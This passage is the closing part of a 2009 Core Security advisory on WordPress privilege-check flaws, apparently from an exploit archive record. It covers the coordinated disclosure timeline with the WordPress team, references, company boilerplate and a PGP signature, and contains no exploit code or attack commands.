the\nfour proof of concept abuses included in the advisory draft. Core\nreminds the WordPress team that the advisory is scheduled to be\npublished on June 22th but a new schedule can be discussed.\n\n. 2009-06-19:\nCore asks for a new patched version of WordPress, if available, and\nnotifies the WordPress team that the publication of the advisory was\nre-scheduled to June 30th.\n\n. 2009-06-19:\nWordPress team confirms they have a new patch that has the potential to\nbreak a lot of plugins.\n\n. 2009-06-29:\nWordPress team asks for a delayance on advisory CORE-2009-0515\npublication until July 6th, when WordPress MU version will be patched.\n\n. 2009-06-29:\nCore agrees to delay publication of advisory CORE-2009-0515 until July 6th.\n\n. 2009-06-29:\nCore tells the WordPress team that other administrative PHP modules can\nalso be rendered by non-administrative users, such as module\n'admin-post.php' and 'link-parse-opml.php'.\n\n. 2009-07-02:\nWordPress team comments that 'admin.php' and 'admin-post.php' are\nintentionally open and plugins can choose to hook either privileged or\nunprivileged actions. They also comment that unprivileged access to\n'link-parse-opml.php' is benign but having this file open is bad form.\n\n. 2009-07-02:\nCore sends the WordPress team a new draft of the advisory and comments\nthat there is no capability specified in Worpress documentation for\nconfiguring plugins. Also control of actions registered by plugins is\nnot enforced. Core also notices that the privileges unchecked bug in\n'admin.php?page=' is fixed on WordPress 2.8.1-beta2 latest development\nrelease.\n\n. 2009-07-06:\nCore requests WordPress confirmation of the release date of WordPress\n2.8.1 and WordPress MU 2.8.\n\n. 2009-07-07:\nWordPress team confirms that a release candidate of WordPress 2.8.1 is\nmade available to users and that the advisory may be published.\n\n. 2009-07-06:\nCore requests WordPress confirmation of the release date of WordPress MU\nand WordPress MU new version numbers.\n\n. 2009-07-07:\nWordPress team release WordPress 2.8.1 RC1 to its users.\n\n. 2009-07-08:\nWordPress team confirms that WordPress MU 2.8.1 will be made available\nas soon WordPress 2.8.1 is officially released. Probably July 8th or 9th.\n\n. 2009-07-08:\nThe advisory CORE-2009-0515 is published.\n\n\n\n10. *References*\n\n[1] WordPress vulnerabilities in CVE database\nhttp://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=wordpress\n[2] SecuriTeam List of WordPress Vulnerabilities\nhttp://www.securiteam.com/products/W/Wordpress.html\n[3] WordPress Vulnerability - YBO Interactive Blog\nhttp://www.ybo-interactive.com/blog/2008/03/30/wordpress-vulnerability/\n[4] bablooO/blyat attacks on WP 2.7.0 and 2.7.1\nhttp://wordpress.org/support/topic/280748\n[5] Security breach - xkcd blog\nhttp://blag.xkcd.com/2009/06/18/security-breach/\n[6] securityvulns.com WordPress vulnerabilities digest in English\nhttp://www.securityfocus.com/archive/1/archive/1/485786/100/0/threaded\n[7] CVE-2008-0196\nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0196\n[8] WordPress Roles and Capabilities\nhttp://codex.wordpress.org/Roles_and_Capabilities\n[9] WordPress Download Counter\nhttp://wordpress.org/download/counter/\n[10] WordPress Intrusion Detection System Plugin\nhttp://php-ids.org/2008/02/21/wpids-version-012-released/\n[11] Hardening WordPress with htaccess\nhttp://blogsecurity.net/wordpress/article-210607\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://www.coresecurity.com/corelabs.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2009 Core Security\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\nprovided that no fee is charged for this distribution and proper credit\nis given.\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.6 (MingW32)\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org\n\niD8DBQFKVR7gyNibggitWa0RAin3AKCOrLLQ8XZnrCLot5d9xoZW6sdWwwCfTJ4N\nTPRpR0Gn0WqmF8HOeDslbA8=\n=zEDK\n-----END PGP SIGNATURE-----\n\n# milw0rm.com [2009-07-10]", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}]}
